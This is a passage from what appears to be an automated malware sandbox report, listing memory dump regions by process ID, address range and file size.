                                                                                                                                                                                                        • memory/2552-330-0x0000000001040000-0x0000000001049000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          36KB

                                                                                                                                                                                                        • memory/2552-332-0x0000000001030000-0x000000000103F000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          60KB

                                                                                                                                                                                                        • memory/2552-328-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2592-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2592-239-0x0000000001240000-0x000000000124E000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          56KB

                                                                                                                                                                                                        • memory/2592-237-0x0000000001210000-0x0000000001219000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          36KB

                                                                                                                                                                                                        • memory/2676-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2820-288-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2908-289-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2912-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2960-157-0x0000000006170000-0x0000000006714000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          5.6MB

                                                                                                                                                                                                        • memory/2960-159-0x0000000005C10000-0x0000000005C60000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          320KB

                                                                                                                                                                                                        • memory/2960-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2960-143-0x0000000000CC0000-0x0000000000EC6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                        • memory/2960-145-0x0000000071000000-0x0000000071089000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          548KB

                                                                                                                                                                                                        • memory/2960-158-0x0000000005C60000-0x0000000005CF2000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          584KB

                                                                                                                                                                                                        • memory/2984-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2984-212-0x0000000000760000-0x0000000000F02000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          7.6MB

                                                                                                                                                                                                        • memory/3028-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3136-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3180-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3320-285-0x000000002ED40000-0x000000002EDFF000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          764KB

                                                                                                                                                                                                        • memory/3320-293-0x000000002D600000-0x000000002D6B9000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          740KB

                                                                                                                                                                                                        • memory/3320-278-0x00000000029C0000-0x00000000039C0000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          16.0MB

                                                                                                                                                                                                        • memory/3320-276-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3320-286-0x000000002EEC0000-0x000000002EF7F000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          764KB

                                                                                                                                                                                                        • memory/3320-301-0x000000002D6D0000-0x000000002D773000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          652KB

                                                                                                                                                                                                        • memory/3416-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3416-287-0x0000000000D60000-0x0000000000F8E000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.2MB

                                                                                                                                                                                                        • memory/3416-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3520-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3628-273-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3632-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3708-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3916-284-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3920-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3928-317-0x00000000008C0000-0x0000000000935000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          468KB

                                                                                                                                                                                                        • memory/3928-318-0x0000000000850000-0x00000000008BB000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          428KB

                                                                                                                                                                                                        • memory/3928-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4012-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4012-315-0x0000000000F80000-0x0000000000F87000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          28KB

                                                                                                                                                                                                        • memory/4012-316-0x0000000000F70000-0x0000000000F7C000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          48KB

                                                                                                                                                                                                        • memory/4028-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4072-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4120-268-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4124-336-0x000001BB15CF0000-0x000001BB15CF6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          24KB

                                                                                                                                                                                                        • memory/4124-333-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4136-388-0x0000000000400000-0x0000000000521000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                        • memory/4168-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4184-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4276-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4328-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4392-350-0x00000000029F0000-0x00000000039F0000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          16.0MB

                                                                                                                                                                                                        • memory/4392-354-0x000000002D570000-0x000000002D62A000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          744KB

                                                                                                                                                                                                        • memory/4392-355-0x000000002D640000-0x000000002D6E5000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          660KB

                                                                                                                                                                                                        • memory/4396-412-0x0000000140000000-0x0000000140786000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          7.5MB

                                                                                                                                                                                                        • memory/4396-416-0x0000000140000000-0x0000000140786000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          7.5MB

                                                                                                                                                                                                        • memory/4420-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4576-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4580-194-0x000000000089E000-0x00000000008C4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          152KB

                                                                                                                                                                                                        • memory/4580-269-0x000000000089E000-0x00000000008C4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          152KB

                                                                                                                                                                                                        • memory/4580-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4580-270-0x0000000000400000-0x0000000000676000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                        • memory/4580-323-0x000000000089E000-0x00000000008C4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          152KB

                                                                                                                                                                                                        • memory/4580-196-0x00000000007F0000-0x000000000082F000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          252KB

                                                                                                                                                                                                        • memory/4580-197-0x0000000000400000-0x0000000000676000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                        • memory/4580-324-0x0000000000400000-0x0000000000676000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                        • memory/4596-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4596-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4596-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4800-320-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4804-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4988-283-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5036-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5036-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5036-236-0x0000000140000000-0x0000000140676000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          6.5MB